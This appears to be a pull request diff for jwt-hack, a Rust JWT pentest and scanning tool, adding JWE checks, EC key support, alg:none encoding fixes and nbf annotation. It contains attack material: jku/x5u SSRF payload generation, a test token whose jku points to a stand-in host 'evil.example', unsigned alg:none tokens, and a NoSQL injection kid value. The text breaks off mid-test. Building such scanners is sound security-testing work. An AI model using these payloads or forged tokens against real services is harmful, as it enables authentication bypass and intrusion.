### PR TITLE
Round-based bug audit: 15 fixes (EC/JWE/ES512, alg:none, scan false-positives)

### DIFF
--- a/src/cmd/crack.rs
+++ b/src/cmd/crack.rs
@@ -654,6 +654,28 @@ fn crack_dictionary(
     ))
 }
 
+/// Whether a brute-force over `charset` with char-length range `min_len..=max_len`
+/// can produce a candidate of exactly 16 or 32 *bytes* — the only valid
+/// content-encryption-key sizes for JWE `dir` mode (A128GCM / A256GCM).
+///
+/// Accounts for multibyte charsets: a candidate of `len` characters spans
+/// `len*min_char_bytes ..= len*max_char_bytes` bytes. Returns false for an empty
+/// charset (nothing to search).
+fn jwe_dir_key_reachable(charset: &str, min_len: usize, max_len: usize) -> bool {
+    let (min_b, max_b) = charset.chars().fold((usize::MAX, 0usize), |(lo, hi), c| {
+        let b = c.len_utf8();
+        (lo.min(b), hi.max(b))
+    });
+    if max_b == 0 {
+        return false; // empty charset
+    }
+    (min_len..=max_len).any(|len| {
+        let lo = len.saturating_mul(min_b);
+        let hi = len.saturating_mul(max_b);
+        (lo..=hi).contains(&16) || (lo..=hi).contains(&32)
+    })
+}
+
 /// Streaming brute-force: each rayon worker materializes candidates from an
 /// integer index into a reusable byte buffer, avoiding the per-candidate
 /// `String` allocation of the legacy `Vec<String>` chunk path.
@@ -684,6 +706,17 @@ fn crack_bruteforce(
             "max length {} exceeds supported brute-force limit of {}",
             max_length,
             crack::brute::MAX_BRUTE_LENGTH
+        );
+    }
+
+    // JWE `dir` mode uses the guessed key directly as the content-encryption key,
+    // which must be exactly 16 (A128GCM) or 32 (A256GCM) bytes. If no candidate in
+    // the requested length range can reach those byte sizes, the search is
+    // guaranteed to find nothing — tell the user instead of silently churning.
+    if is_jwe && emit_output && !jwe_dir_key_reachable(chars, min_length, max_length) {
+        utils::log_warning(
+            "JWE 'dir' keys must be 16 or 32 bytes; no candidate in this length range can match. \
+             Increase --max (and adjust the charset) to reach a 16- or 32-byte key.",
         );
     }
 
@@ -1451,6 +1484,25 @@ mod tests {
         );
 
         // Clean up is automatic when wordlist goes out of scope
+    }
+
+    #[test]
+    fn test_jwe_dir_key_reachable() {
+        // ASCII charset: byte length == char length.
+        assert!(!jwe_dir_key_reachable("abc", 1, 8)); // max 8 bytes, can't reach 16
+        assert!(jwe_dir_key_reachable("abc", 1, 16)); // length 16 -> 16 bytes
+        assert!(jwe_dir_key_reachable("abc", 32, 32)); // length 32 -> 32 bytes
+        assert!(!jwe_dir_key_reachable("abc", 17, 31)); // straddles but hits neither 16 nor 32
+        assert!(!jwe_dir_key_reachable("", 1, 32)); // empty charset
+
+        // Uniform 3-byte charset can never total exactly 16 or 32 bytes
+        // (neither is a multiple of 3), so no length is ever reachable.
+        assert!(!jwe_dir_key_reachable("글한", 1, 10));
+
+        // Mixed 1-byte + 3-byte charset: a 6-char candidate spans 6..=18 bytes,
+        // which includes 16, so the range is reachable.
+        assert!(jwe_dir_key_reachable("a글", 6, 6));
+        assert!(!jwe_dir_key_reachable("a글", 1, 5)); // 1..=15 bytes, misses 16
     }
 
     #[test]

--- a/src/cmd/decode.rs
+++ b/src/cmd/decode.rs
@@ -15,7 +15,7 @@ fn format_unix_timestamp(seconds: i64) -> Option<String> {
         .map(|dt| dt.format("%Y-%m-%d %H:%M:%S UTC").to_string())
 }
 
-/// Reads a NumericDate claim (`exp`/`iat`) as seconds. Accepts both integer and
+/// Reads a NumericDate claim (`exp`/`nbf`/`iat`) as seconds. Accepts both integer and
 /// float JSON numbers (RFC 7519 allows non-integer NumericDate). Out-of-range
 /// values are later dropped by `format_unix_timestamp` rather than panicking.
 fn claim_seconds(value: &Value) -> Option<i64> {
@@ -48,6 +48,37 @@ fn process_expiration_claim(claims: &Value, claims_map: &mut Value) {
                     obj.insert(
                         "exp_status".to_string(),
                         Value::String(if is_expired { "EXPIRED" } else { "VALID" }.to_string()),
+                    );
+                }
+            }
+        }
+    }
+}
+
+/// Annotate not-before claim with human-readable timestamp and active status.
+///
+/// `nbf` (RFC 7519 §4.1.5) is a NumericDate like `iat`/`exp`; it was previously
+/// left un-annotated, so a token that is not yet valid gave no hint of that in
+/// the decoded output.
+fn process_not_before_claim(claims: &Value, claims_map: &mut Value) {
+    if let Some(nbf) = claims.get("nbf") {
+        if let Some(nbf_seconds) = claim_seconds(nbf) {
+            if let Some(formatted_time) = format_unix_timestamp(nbf_seconds) {
+                let now = chrono::Utc::now().timestamp();
+                let not_yet_valid = now < nbf_seconds;
+
+                if let Some(obj) = claims_map.as_object_mut() {
+                    obj.insert("nbf_time".to_string(), Value::String(formatted_time));
+                    obj.insert(
+                        "nbf_status".to_string(),
+                        Value::String(
+                            if not_yet_valid {
+                                "NOT_YET_VALID"
+                            } else {
+                                "ACTIVE"
+                            }
+                            .to_string(),
+                        ),
                     );
                 }
             }
@@ -121,6 +152,7 @@ fn decode_jwt_token(token: &str) -> Result<()> {
 
     let mut claims_map: Value = decoded.claims.clone();
     process_issued_at_claim(&decoded.claims, &mut claims_map);
+    process_not_before_claim(&decoded.claims, &mut claims_map);
     process_expiration_claim(&decoded.claims, &mut claims_map);
 
     println!("\n{}", theme::subsection_line("Payload"));
@@ -142,6 +174,7 @@ fn decode_jwt_token_json(token: &str) -> Result<Value> {
 
     let mut claims_map: Value = decoded.claims.clone();
     process_issued_at_claim(&decoded.claims, &mut claims_map);
+    process_not_before_claim(&decoded.claims, &mut claims_map);
     process_expiration_claim(&decoded.claims, &mut claims_map);
 
     Ok(serde_json::json!({
@@ -390,6 +423,34 @@ mod tests {
         assert!(
             payload.get("iat_time").is_some(),
             "float iat should be annotated with iat_time"
+        );
+    }
+
+    #[test]
+    fn test_decode_annotates_nbf() {
+        // nbf is a NumericDate like iat/exp and must be annotated with a
+        // human-readable time and an active/not-yet-valid status.
+        let future = Utc::now().timestamp() + 86_400; // 1 day out -> not yet valid
+        let past = Utc::now().timestamp() - 86_400; // active
+        let claims = json!({ "sub": "u", "nbf": future });
+        let token = jwt::encode(&claims, "", "HS256").expect("token");
+        let payload = execute_json(&token).expect("decode");
+        let p = payload.get("payload").expect("payload");
+        assert!(p.get("nbf_time").is_some(), "nbf should be annotated");
+        assert_eq!(
+            p.get("nbf_status").and_then(|v| v.as_str()),
+            Some("NOT_YET_VALID")
+        );
+
+        let claims = json!({ "sub": "u", "nbf": past });
+        let token = jwt::encode(&claims, "", "HS256").expect("token");
+        let payload = execute_json(&token).expect("decode");
+        assert_eq!(
+            payload
+                .get("payload")
+                .and_then(|p| p.get("nbf_status"))
+                .and_then(|v| v.as_str()),
+            Some("ACTIVE")
         );
     }
 

--- a/src/cmd/jwks.rs
+++ b/src/cmd/jwks.rs
@@ -243,6 +243,24 @@ pub fn execute_fetch(url: &str) {
                         if let Some(y) = &key.y {
                             println!("{}", theme::kv_line("Y", y, 18));
                         }
+
+                        // Offer the extractable public-key PEM, mirroring the RSA
+                        // branch, so users can feed it straight to `verify`.
+                        match jwks::jwk_ec_to_pem(key) {
+                            Ok(pem) => {
+                                println!(
+                                    "{}",
+                                    theme::kv_line("PEM", "OK (extractable)".green(), 18)
+                                );
+                                println!("\n{}", pem);
+                            }
+                            Err(e) => {
+                                println!(
+                                    "{}",
+                                    theme::kv_line("PEM", format!("Error: {}", e).red(), 18)
+                                );
+                            }
+                        }
                     }
                     "oct" => {
                         println!(

--- a/src/cmd/mcp.rs
+++ b/src/cmd/mcp.rs
@@ -204,8 +204,17 @@ impl JwtHackServer {
             )]));
         };
 
+        // For an unsigned token the algorithm must be "none"; otherwise the
+        // requested/default algorithm (e.g. HS256) is paired with KeyData::None and
+        // encode_with_options fails with "No key or secret provided".
+        let algorithm: &str = if args.no_signature {
+            "none"
+        } else {
+            &args.algorithm
+        };
+
         let options = crate::jwt::EncodeOptions {
-            algorithm: &args.algorithm,
+            algorithm,
             key_data,
             header_params: None::<std::collections::HashMap<&str, &str>>,
             compress_payload: false,
@@ -509,6 +518,34 @@ mod tests {
 
         let call_result = result.unwrap();
         assert!(call_result.is_error != Some(true));
+    }
+
+    #[tokio::test]
+    async fn test_encode_tool_no_signature_emits_none() {
+        // no_signature must produce an alg:none token, not fail because the default
+        // algorithm (HS256) was left paired with KeyData::None.
+        let server = JwtHackServer::new();
+        let args = EncodeArgs {
+            json: r#"{"sub":"x"}"#.to_string(),
+            secret: None,
+            algorithm: default_algorithm(), // "HS256"
+            no_signature: true,
+        };
+        let call_result = server.encode(Parameters(args)).await.unwrap();
+        assert!(
+            call_result.is_error != Some(true),
+            "no_signature encode errored"
+        );
+        let text = call_result
+            .content
+            .first()
+            .and_then(|c| c.as_text().map(|t| t.text.clone()))
+            .expect("token text");
+        let decoded = crate::jwt::decode(&text).expect("decode none token");
+        assert_eq!(
+            decoded.header.get("alg").and_then(|v| v.as_str()),
+            Some("none")
+        );
     }
 
     #[tokio::test]

--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -410,6 +410,24 @@ fn collect_attack_payloads(token: &str, results: &[VulnerabilityResult]) -> Resu
         }
     }
 
+    // A flagged JKU/X5U Header finding records both "jku" and "x5u" targets, but
+    // previously nothing consumed them here — so a HIGH-severity JKU/X5U detection
+    // produced an empty attack_payloads list while every other finding contributed
+    // payloads. generate_jku_x5u_ssrf_payload emits jku variants first, then x5u
+    // variants; sample from both ends so the report shows one of each header type.
+    if targets.contains("jku") || targets.contains("x5u") {
+        if let Ok(payloads) = payload::generate_jku_x5u_ssrf_payload(token) {
+            if let Some(first) = payloads.first() {
+                payloads_out.push(first.clone());
+            }
+            if payloads.len() > 1 {
+                if let Some(last) = payloads.last() {
+                    payloads_out.push(last.clone());
+                }
+            }
+        }
+    }
+
     if targets.contains("kid_sql") {
         if let Ok(payloads) = payload::generate_kid_sql_payload(token) {
             payloads_out.extend(payloads.into_iter().take(2));
@@ -1706,6 +1724,50 @@ mod tests {
         let d = jwt::decode(&none).unwrap();
         let r = check_jku_x5u_vulnerabilities(&d).unwrap();
         assert!(!r.vulnerable);
+    }
+
+    #[test]
+    fn test_jku_x5u_finding_emits_attack_payloads() {
+        // Regression: a flagged JKU/X5U Header finding records "jku"/"x5u" targets,
+        // but collect_attack_payloads used to drop them, yielding an empty payload
+        // list for a HIGH-severity finding. It must now emit jku/x5u SSRF payloads.
+        let token = synthetic_token(
+            json!({ "jku": "https://evil.example/jwks" }),
+            json!({ "sub": "x" }),
+        );
+        let results = vec![check_jku_x5u_vulnerabilities(&jwt::decode(&token).unwrap()).unwrap()];
+        assert!(results[0].vulnerable, "jku token should be flagged");
+
+        let payloads = collect_attack_payloads(&token, &results).expect("collect payloads");
+        assert!(
+            !payloads.is_empty(),
+            "JKU/X5U finding must contribute attack payloads, got none"
+        );
+        // The sampled payloads should carry a jku and/or x5u header injecting a
+        // probe URL rather than being empty or unrelated.
+        let has_jku = payloads.iter().any(|p| {
+            get_header_from_token(p)
+                .and_then(|h| h.get("jku").cloned())
+                .is_some()
+        });
+        let has_x5u = payloads.iter().any(|p| {
+            get_header_from_token(p)
+                .and_then(|h| h.get("x5u").cloned())
+                .is_some()
+        });
+        assert!(
+            has_jku || has_x5u,
+            "expected jku/x5u header injection payloads, got {payloads:?}"
+        );
+    }
+
+    fn get_header_from_token(token_str: &str) -> Option<serde_json::Value> {
+        use base64::Engine;
+        let part = token_str.split('.').next()?;
+        let bytes = base64::engine::general_purpose::URL_SAFE_NO_PAD
+            .decode(part)
+            .ok()?;
+        serde_json::from_slice(&bytes).ok()
     }
 
     #[test]

--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -1267,6 +1267,21 @@ fn check_jku_x5u_vulnerabilities(decoded: &jwt::DecodedToken) -> Result<Vulnerab
 /// Check for `typ` confusion (non-standard or omitted media types).
 fn check_typ_confusion(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
     let name = "typ Confusion".to_string();
+    // A present-but-non-string `typ` (object/array/number) is a parser-confusion
+    // signal, not a "missing typ". Detecting it explicitly avoids reporting it as
+    // absent (`get("typ").and_then(as_str)` returns None for both cases).
+    if let Some(v) = decoded.header.get("typ") {
+        if !v.is_string() {
+            return Ok(VulnerabilityResult {
+                name,
+                vulnerable: true,
+                details: format!(
+                    "'typ' is a non-string value ({v}) — parser confusion; validators may disagree on the media type"
+                ),
+                severity: Severity::Medium,
+            });
+        }
+    }
     let result = match decoded.header.get("typ").and_then(|v| v.as_str()) {
         Some("JWT") => VulnerabilityResult {
             name,
@@ -2184,6 +2199,21 @@ mod tests {
         let token3 = synthetic_token(json!({ "typ": "JWT" }), json!({}));
         let r3 = check_typ_confusion(&jwt::decode(&token3).unwrap()).unwrap();
         assert!(!r3.vulnerable);
+    }
+
+    #[test]
+    fn test_check_typ_confusion_non_string_is_flagged_not_missing() {
+        // A present-but-non-string typ must be flagged as parser confusion, not
+        // reported as a missing typ.
+        let decoded = header_only_decoded(r#"{"alg":"HS256","typ":{"x":1}}"#);
+        let r = check_typ_confusion(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::Medium);
+        assert!(
+            r.details.contains("non-string") && !r.details.contains("missing"),
+            "details: {}",
+            r.details
+        );
     }
 
     #[test]

--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -226,8 +226,162 @@ fn run_scan(token: &str, options: &ScanOptions, report_path: Option<&PathBuf>) -
     Ok(())
 }
 
+/// Analyze a JWE (encrypted) token for encryption-layer misconfigurations.
+///
+/// Unlike the JWS path this evaluates the `alg` (key management) and `enc`
+/// (content encryption) choices plus IV/tag/compression, rather than signature
+/// shape — a JWE has no signature to reason about.
+fn scan_jwe_token(token: &str) -> Result<ScanReport> {
+    use base64::Engine;
+    let decoded = jwt::decode_jwe(token)?;
+    let mut results: Vec<VulnerabilityResult> = Vec::new();
+
+    // Key management: `none` = encryption bypass.
+    let alg = decoded.algorithm.as_str();
+    if alg.eq_ignore_ascii_case("none") {
+        results.push(VulnerabilityResult {
+            name: "JWE Key Management".to_string(),
+            vulnerable: true,
+            details: "'alg' is 'none' — encryption/key-management bypass".to_string(),
+            severity: Severity::Critical,
+        });
+    } else {
+        results.push(VulnerabilityResult {
+            name: "JWE Key Management".to_string(),
+            vulnerable: false,
+            details: format!("Key management algorithm: {}", alg),
+            severity: Severity::Info,
+        });
+    }
+
+    // Direct symmetric encryption is brute-forceable when a weak CEK is used.
+    if alg == "dir" {
+        results.push(VulnerabilityResult {
+            name: "Direct Encryption".to_string(),
+            vulnerable: true,
+            details: "'dir' mode — the content-encryption key is used directly and may be brute-forced if weak".to_string(),
+            severity: Severity::Low,
+        });
+    }
+
+    // Content encryption: CBC modes are padding-oracle prone.
+    let enc = decoded.encryption.as_str();
+    let enc_result = match enc {
+        "A128CBC-HS256" | "A192CBC-HS384" | "A256CBC-HS512" => VulnerabilityResult {
+            name: "Content Encryption".to_string(),
+            vulnerable: true,
+            details: format!(
+                "{enc} uses CBC mode — potentially vulnerable to padding-oracle attacks"
+            ),
+            severity: Severity::High,
+        },
+        "A128GCM" => VulnerabilityResult {
+            name: "Content Encryption".to_string(),
+            vulnerable: true,
+            details: "A128GCM — 128-bit content encryption; prefer A256GCM".to_string(),
+            severity: Severity::Low,
+        },
+        "A256GCM" | "A192GCM" => VulnerabilityResult {
+            name: "Content Encryption".to_string(),
+            vulnerable: false,
+            details: format!("{enc} (AEAD)"),
+            severity: Severity::Info,
+        },
+        other => VulnerabilityResult {
+            name: "Content Encryption".to_string(),
+            vulnerable: true,
+            details: format!("Unrecognized 'enc' value: {other}"),
+            severity: Severity::Medium,
+        },
+    };
+    results.push(enc_result);
+
+    // Compression enabled -> CRIME-like risk.
+    let zip_def = decoded
+        .header
+        .get("zip")
+        .and_then(|v| v.as_str())
+        .map(|s| s.eq_ignore_ascii_case("DEF"))
+        .unwrap_or(false);
+    results.push(if zip_def {
+        VulnerabilityResult {
+            name: "Compression (zip)".to_string(),
+            vulnerable: true,
+            details: "'zip' is DEF — compression before encryption enables CRIME-like attacks"
+                .to_string(),
+            severity: Severity::Medium,
+        }
+    } else {
+        VulnerabilityResult {
+            name: "Compression (zip)".to_string(),
+            vulnerable: false,
+            details: "No pre-encryption compression".to_string(),
+            severity: Severity::Info,
+        }
+    });
+
+    // IV length (GCM wants a 96-bit / 12-byte nonce).
+    if !decoded.iv.is_empty() {
+        if let Ok(iv) = base64::engine::general_purpose::URL_SAFE_NO_PAD.decode(&decoded.iv) {
+            if iv.len() < 12 {
+                results.push(VulnerabilityResult {
+                    name: "IV".to_string(),
+                    vulnerable: true,
+                    details: format!("IV is {} bytes — GCM expects a 12-byte nonce", iv.len()),
+                    severity: Severity::Medium,
+                });
+            }
+        }
+    }
+
+    // Auth tag length.
+    if !decoded.tag.is_empty() {
+        if let Ok(tag) = base64::engine::general_purpose::URL_SAFE_NO_PAD.decode(&decoded.tag) {
+            if tag.len() < 16 {
+                results.push(VulnerabilityResult {
+                    name: "Authentication Tag".to_string(),
+                    vulnerable: true,
+                    details: format!("Auth tag is {} bytes — expected at least 16", tag.len()),
+                    severity: Severity::Medium,
+                });
+            }
+        }
+    }
+
+    let summary = summarize_results(&results);
+    Ok(ScanReport {
+        success: true,
+        token_type: "jwe".to_string(),
+        algorithm: decoded.algorithm.clone(),
+        typ: decoded
+            .header
+            .get("typ")
+            .and_then(|v| v.as_str())
+            .unwrap_or("JWE")
+            .to_string(),
+        strict_decode_ok: true,
+        strict_decode_error: None,
+        results,
+        summary,
+        attack_payloads: None,
+    })
+}
+
 fn scan_token(token: &str, options: &ScanOptions, include_payloads: bool) -> Result<ScanReport> {
     let token_type = jwt::detect_token_type(token);
+
+    // A JWE (5 segments) is an *encrypted* token, not a JWS. Running the signature
+    // and typ checks on it produces false positives — most glaringly a HIGH
+    // "Unexpected segment count: 5" for what is a perfectly valid JWE — while never
+    // surfacing the actual JWE risks (weak enc, CBC padding oracle, CRIME, etc.).
+    // Route JWEs through a dedicated analysis instead.
+    if token_type == jwt::TokenType::Jwe {
+        if let Ok(report) = scan_jwe_token(token) {
+            return Ok(report);
+        }
+        // Fall through to the JWS path only if the JWE failed to parse.
+    }
+
     let token_type_str = match token_type {
         jwt::TokenType::Jwt => "jwt",
         jwt::TokenType::Jwe => "jwe",
@@ -2098,6 +2252,50 @@ mod tests {
         let r = check_psychic_signature(&token, &decoded).unwrap();
         assert!(r.vulnerable);
         assert_eq!(r.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn test_scan_jwe_uses_jwe_checks_not_signature_shape() {
+        // A real A128GCM JWE must be analyzed as encrypted content, never flagged
+        // for its (valid) 5-segment shape via the JWS "Signature Segment" check.
+        let jwe = jwt::encode_jwe(
+            r#"{"sub":"a"}"#,
+            jwt::JweKeyManagement::Direct("0123456789abcdef"),
+            jwt::JweContentEncryption::A128GCM,
+        )
+        .expect("build jwe");
+        let report = scan_jwe_token(&jwe).expect("scan jwe");
+        assert_eq!(report.token_type, "jwe");
+        assert!(
+            report.results.iter().all(|r| r.name != "Signature Segment"),
+            "JWE must not be scored with the JWS signature-shape check"
+        );
+        assert!(report
+            .results
+            .iter()
+            .any(|r| r.name == "Content Encryption"));
+    }
+
+    #[test]
+    fn test_scan_jwe_flags_none_and_cbc() {
+        use base64::Engine;
+        let header = base64::engine::general_purpose::URL_SAFE_NO_PAD
+            .encode(br#"{"alg":"none","enc":"A128CBC-HS256"}"#);
+        // header.encrypted_key.iv.ciphertext.tag  (dummy but well-formed base64url)
+        let jwe = format!("{header}..aXYaXYaXYaXYaXYa.Y3Q.dGFndGFndGFndGFn");
+        let report = scan_jwe_token(&jwe).expect("scan jwe");
+        assert!(
+            report.results.iter().any(|r| r.name == "JWE Key Management"
+                && r.vulnerable
+                && r.severity == Severity::Critical),
+            "alg:none must be Critical"
+        );
+        assert!(
+            report.results.iter().any(|r| r.name == "Content Encryption"
+                && r.vulnerable
+                && r.severity == Severity::High),
+            "CBC enc must be High (padding oracle)"
+        );
     }
 
     #[test]

--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -882,7 +882,9 @@ fn check_signature_segment(
     let is_none = alg_str.contains("none") || header_alg == "none";
 
     let sig = parts.get(2).copied().unwrap_or("");
-    // The encoder writes `''` for the none-alg sentinel; treat that as empty too.
+    // Defensively treat a literal `''` third segment as empty too: older jwt-hack
+    // builds (and some third-party tools) emit `header.payload.''` for alg:none
+    // instead of a truly empty signature.
     let sig_trim = sig.trim_matches('\'');
     let is_empty = sig_trim.is_empty();
 

--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -736,6 +736,27 @@ fn check_kid_vulnerabilities(decoded: &jwt::DecodedToken) -> Result<Vulnerabilit
             details: "No 'kid' header".to_string(),
             severity: Severity::Info,
         },
+        // A non-string `kid` (object/array) is itself a strong signal: a JSON
+        // object like {"$ne": null} is a NoSQL operator-injection payload, and
+        // arrays trip parser-confusion. Previously `as_str().unwrap_or("")`
+        // collapsed these to an empty string, hiding both the value and the risk.
+        Some(kid_value) if !kid_value.is_string() => VulnerabilityResult {
+            name: "Kid Header".to_string(),
+            vulnerable: true,
+            details: format!(
+                "'kid' is a non-string {} ({}) — parser confusion / NoSQL operator injection vector",
+                match kid_value {
+                    serde_json::Value::Object(_) => "object",
+                    serde_json::Value::Array(_) => "array",
+                    serde_json::Value::Number(_) => "number",
+                    serde_json::Value::Bool(_) => "boolean",
+                    serde_json::Value::Null => "null",
+                    serde_json::Value::String(_) => "string",
+                },
+                kid_value
+            ),
+            severity: Severity::High,
+        },
         Some(kid_value) => {
             let kid_str = kid_value.as_str().unwrap_or("").to_string();
             let lower = kid_str.to_lowercase();
@@ -1912,6 +1933,21 @@ mod tests {
         let decoded = jwt::decode(&token).unwrap();
         let r = check_kid_vulnerabilities(&decoded).unwrap();
         assert_eq!(r.severity, Severity::Medium);
+    }
+
+    #[test]
+    fn test_check_kid_header_object_is_high_and_shows_value() {
+        // A JSON-object kid (e.g. a NoSQL {"$ne": null} operator) must be flagged
+        // High and its value surfaced, not collapsed to an empty string.
+        let decoded = header_only_decoded(r#"{"alg":"HS256","kid":{"$ne":null}}"#);
+        let r = check_kid_vulnerabilities(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::High);
+        assert!(
+            r.details.contains("$ne") && r.details.contains("non-string"),
+            "details should surface the object value: {}",
+            r.details
+        );
     }
 
     #[test]

--- a/src/cmd/server.rs
+++ b/src/cmd/server.rs
@@ -234,7 +234,15 @@ async fn handle_decode(Json(req): Json<DecodeRequest>) -> Result<Json<DecodeResp
 
 /// Encode endpoint handler
 async fn handle_encode(Json(req): Json<EncodeRequest>) -> Result<Json<EncodeResponse>, ApiError> {
-    let algorithm = req.algorithm.as_deref().unwrap_or("HS256");
+    // `no_signature` means an unsigned alg:none token. The algorithm must be
+    // forced to "none" (as the CLI does); leaving it at the requested/default
+    // algorithm while passing KeyData::None makes encode_with_options fail with
+    // "No key or secret provided".
+    let algorithm = if req.no_signature {
+        "none"
+    } else {
+        req.algorithm.as_deref().unwrap_or("HS256")
+    };
     let headers = req.headers.unwrap_or_default();
 
     let options = jwt::EncodeOptions {
@@ -848,6 +856,35 @@ mod tests {
         let response = result.unwrap().0;
         assert!(response.success);
         assert!(response.token.is_some());
+    }
+
+    #[tokio::test]
+    async fn test_handle_encode_no_signature_produces_none_token() {
+        // no_signature must yield an unsigned alg:none token, not an error. The
+        // handler previously kept algorithm=HS256 while passing KeyData::None, so
+        // encoding failed with "No key or secret provided".
+        let req = EncodeRequest {
+            payload: serde_json::json!({"sub": "test"}),
+            secret: None,
+            algorithm: None,
+            no_signature: true,
+            headers: None,
+            compress: false,
+        };
+
+        let response = handle_encode(Json(req)).await.unwrap().0;
+        assert!(
+            response.success,
+            "no_signature encode failed: {:?}",
+            response.error
+        );
+        let token = response.token.expect("token");
+        let decoded = jwt::decode(&token).expect("decode none token");
+        assert_eq!(
+            decoded.header.get("alg").and_then(|v| v.as_str()),
+            Some("none"),
+            "no_signature must emit alg:none"
+        );
     }
 
     #[tokio::test]

--- a/src/jwks/mod.rs
+++ b/src/jwks/mod.rs
@@ -134,6 +134,59 @@ pub fn jwk_rsa_to_pem(jwk: &Jwk) -> Result<String> {
     Ok(pem)
 }
 
+/// Convert a JWK EC public key (`crv`/`x`/`y`) to a SubjectPublicKeyInfo PEM.
+///
+/// Supports the P-256/P-384/P-521 curves used by ES256/ES384/ES512. Building the
+/// key through OpenSSL from the affine coordinates avoids hand-rolling EC point /
+/// named-curve DER encoding.
+pub fn jwk_ec_to_pem(jwk: &Jwk) -> Result<String> {
+    use openssl::bn::BigNum;
+    use openssl::ec::{EcGroup, EcKey};
+    use openssl::nid::Nid;
+    use openssl::pkey::PKey;
+
+    if jwk.kty != "EC" {
+        return Err(anyhow!("JWK is not an EC key (kty: {})", jwk.kty));
+    }
+
+    let crv = jwk
+        .crv
+        .as_deref()
+        .ok_or_else(|| anyhow!("Missing 'crv' parameter in EC JWK"))?;
+    let nid = match crv {
+        "P-256" => Nid::X9_62_PRIME256V1,
+        "P-384" => Nid::SECP384R1,
+        "P-521" => Nid::SECP521R1,
+        other => return Err(anyhow!("Unsupported EC curve: {}", other)),
+    };
+
+    let x = jwk
+        .x
+        .as_ref()
+        .ok_or_else(|| anyhow!("Missing 'x' parameter in EC JWK"))?;
+    let y = jwk
+        .y
+        .as_ref()
+        .ok_or_else(|| anyhow!("Missing 'y' parameter in EC JWK"))?;
+    let x_bytes = URL_SAFE_NO_PAD
+        .decode(x)
+        .map_err(|e| anyhow!("Failed to decode 'x': {}", e))?;
+    let y_bytes = URL_SAFE_NO_PAD
+        .decode(y)
+        .map_err(|e| anyhow!("Failed to decode 'y': {}", e))?;
+
+    let x_bn = BigNum::from_slice(&x_bytes)?;
+    let y_bn = BigNum::from_slice(&y_bytes)?;
+    let group = EcGroup::from_curve_name(nid)?;
+    let ec_key = EcKey::from_public_key_affine_coordinates(&group, &x_bn, &y_bn)?;
+    ec_key
+        .check_key()
+        .map_err(|e| anyhow!("EC public key is not valid for curve {}: {}", crv, e))?;
+    let pkey = PKey::from_ec_key(ec_key)?;
+    let pem = pkey.public_key_to_pem()?;
+    String::from_utf8(pem).map_err(|e| anyhow!("EC PEM is not valid UTF-8: {}", e))
+}
+
 /// Encode RSA public key components into DER (SubjectPublicKeyInfo) format
 fn encode_rsa_public_key_der(n: &[u8], e: &[u8]) -> Vec<u8> {
     // Encode n and e as ASN.1 INTEGERs
@@ -326,6 +379,48 @@ pub fn verify_with_jwks(token: &str, jwks: &JwkSet) -> Result<Vec<KeyVerifyResul
 
         match jwk.kty.as_str() {
             "RSA" => match jwk_rsa_to_pem(jwk) {
+                Ok(pem) => {
+                    let options = crate::jwt::VerifyOptions {
+                        key_data: crate::jwt::VerifyKeyData::PublicKeyPem(&pem),
+                        validate_exp: false,
+                        validate_nbf: false,
+                        leeway: 0,
+                    };
+                    match crate::jwt::verify_with_options(token, &options) {
+                        Ok(valid) => {
+                            results.push(KeyVerifyResult {
+                                key_index: i,
+                                kid: kid.to_string(),
+                                kty: jwk.kty.clone(),
+                                alg: jwk.alg.clone(),
+                                valid,
+                                error: None,
+                            });
+                        }
+                        Err(e) => {
+                            results.push(KeyVerifyResult {
+                                key_index: i,
+                                kid: kid.to_string(),
+                                kty: jwk.kty.clone(),
+                                alg: jwk.alg.clone(),
+                                valid: false,
+                                error: Some(e.to_string()),
+                            });
+                        }
+                    }
+                }
+                Err(e) => {
+                    results.push(KeyVerifyResult {
+                        key_index: i,
+                        kid: kid.to_string(),
+                        kty: jwk.kty.clone(),
+                        alg: jwk.alg.clone(),
+                        valid: false,
+                        error: Some(format!("Key conversion failed: {}", e)),
+                    });
+                }
+            },
+            "EC" => match jwk_ec_to_pem(jwk) {
                 Ok(pem) => {
                     let options = crate::jwt::VerifyOptions {
                         key_data: crate::jwt::VerifyKeyData::PublicKeyPem(&pem),
@@ -726,6 +821,86 @@ mod tests {
     fn test_generate_spoofed_jwks_unsupported_alg() {
         let result = generate_spoofed_jwks("ES256", None, None);
         assert!(result.is_err());
+    }
+
+    #[test]
+    fn test_verify_with_jwks_ec_p256_key() {
+        // Regression: EC keys (kty:"EC") were reported "Unsupported key type", so an
+        // ES256 token — one of the most common JWT signatures — could never be
+        // verified against its JWKS. Build a real P-256 key, sign a token with it,
+        // publish the public key as an EC JWK, and confirm verification succeeds.
+        use openssl::bn::BigNumContext;
+        use openssl::ec::{EcGroup, EcKey};
+        use openssl::nid::Nid;
+        use openssl::pkey::PKey;
+
+        let group = EcGroup::from_curve_name(Nid::X9_62_PRIME256V1).unwrap();
+        let ec = EcKey::generate(&group).unwrap();
+        let pkey = PKey::from_ec_key(ec.clone()).unwrap();
+        let priv_pem = String::from_utf8(pkey.private_key_to_pem_pkcs8().unwrap()).unwrap();
+
+        let claims = serde_json::json!({ "sub": "ec-user" });
+        let options = crate::jwt::EncodeOptions {
+            algorithm: "ES256",
+            key_data: crate::jwt::KeyData::PrivateKeyPem(&priv_pem),
+            header_params: None,
+            compress_payload: false,
+        };
+        let token = crate::jwt::encode_with_options(&claims, &options).expect("sign ES256 token");
+
+        // Extract affine coordinates for the JWK.
+        let mut ctx = BigNumContext::new().unwrap();
+        let mut x = openssl::bn::BigNum::new().unwrap();
+        let mut y = openssl::bn::BigNum::new().unwrap();
+        ec.public_key()
+            .affine_coordinates_gfp(&group, &mut x, &mut y, &mut ctx)
+            .unwrap();
+        let jwk = Jwk {
+            kty: "EC".to_string(),
+            kid: Some("ec-1".to_string()),
+            alg: Some("ES256".to_string()),
+            key_use: Some("sig".to_string()),
+            key_ops: None,
+            n: None,
+            e: None,
+            crv: Some("P-256".to_string()),
+            x: Some(URL_SAFE_NO_PAD.encode(x.to_vec())),
